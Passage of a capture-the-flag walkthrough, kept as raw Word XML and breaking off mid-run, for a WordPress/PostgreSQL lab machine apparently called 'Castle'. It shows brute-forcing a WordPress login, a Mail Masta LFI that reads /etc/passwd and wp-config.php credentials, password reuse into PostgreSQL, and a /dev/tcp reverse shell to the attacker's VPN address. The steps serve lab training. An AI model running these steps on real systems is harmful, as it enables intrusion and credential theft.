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CASTLE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qo5olh53uch3"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determine the running services and identify accessible ports. To accomplish this task, we will use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 a tool specialized in network mapping and service analysis.</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78100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="76"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According to the Nmap output, we identified a web service running on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">port 80</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, corresponding to a CMS (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WordPress</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), and  database running on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">port 5432</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PostgreSQL</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49500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a black-box testing tool to identify vulnerabilities in WordPress installations and plugins, we detected the presence of the plugin </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mail Masta &lt;= 1.0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which contains an unauthenticated </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local File Inclusion (LFI)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability.</w:t>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06600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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66900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69"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also took the opportunity to enumerate WordPress users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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06600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="52"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850900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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8509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1447800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="70"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943600" cy="14478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673100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="74"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using the brute-force module to attempt login with the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">billy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, who had been identified earlier, we were successful. However, the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">billy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not an administrator, so we are limited and cannot obtain RCE through the admin panel.</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12900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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then shifted our focus to exploiting the LFI vulnerability in the plugin. By using the path </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We successfully read the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd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file. The next step is to read the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wp-config.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, which belongs to WordPress. In this file, we find various configurations, including database credentials.</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38300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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Because the code uses the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">include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function, it is necessary to use a PHP wrapper to encode the file in Base64. This allows us to retrieve the file contents properly. Without this wrapper, we would not be able to read it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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php://filter/convert.base64-encode/resource=/var/www/html/wp-config.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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38300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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decoding the Base64 content, we can read the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wp-config.php</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file. Inside this file, we can see the database access credentials. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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echo -n 'base64' | base64 -d &gt; wp-config.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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19400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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opening the file in Visual Studio Code for better readability, we identified the database credentials. However, we noticed that WordPress uses </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MySQL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. By applying a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">password reuse technique</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we attempted to authenticate to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">using the same password — and successfully logged in.</w:t>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90800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68"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psql -h &lt;ip-machine&gt; -U postgres</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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51000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63"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While researching PostgreSQL exploitation techniques, I found an article explaining how to obtain Remote Code Execution (RCE). However, to achieve this, the database user must be a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">superuser</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We can verify this by executing:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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SELECT usesuper FROM pg_user WHERE usename = 'postgres';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">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2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943600" cy="1181100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66"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Fortunately, we are a superuser. According to the following reference, we can execute SQL commands to achieve RCE:</w:t>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hyperlink r:id="rId23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">5432,5433 - Pentesting PostgreSQL</w:t>
          <w:br w:type="textWrapping"/>
          <w:t xml:space="preserve">https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql#rce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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12900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54"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confirming RCE (based on the output of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command), we can insert a reverse shell payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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"sh -i &gt;&amp; /dev/tcp/&lt;ip-vpn&gt;/4444 0&gt;&amp;1"</w:t>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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">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511300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="71"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952500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58"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executing the command, we obtain a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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12900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56"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rjalelgq5x83" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading the shell to fully interactive TTY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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 fg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">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0"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export TERM=xterm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">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performing enumeration on the server, specifically using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We identified that the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">castle</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is running the Apache service. Therefore, if we can obtain a shell through WordPress, we will get a shell as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">castle</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user, allowing us to retrieve the first flag located in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/castle</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achieve this, we can update the database to grant administrator privileges to the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">billy</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68400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62"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19500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53"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logging in again, we now have administrator privileges. We can obtain a shell as the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">castle</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> by editing a plugin, theme, or other approach. However, in this case, we will leverage the existing LFI vulnerability.</w:t>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create a reverse shell in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/shm. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This allows us to call it through the LFI vulnerability.</w:t>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87500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65"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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">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892300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="48"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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
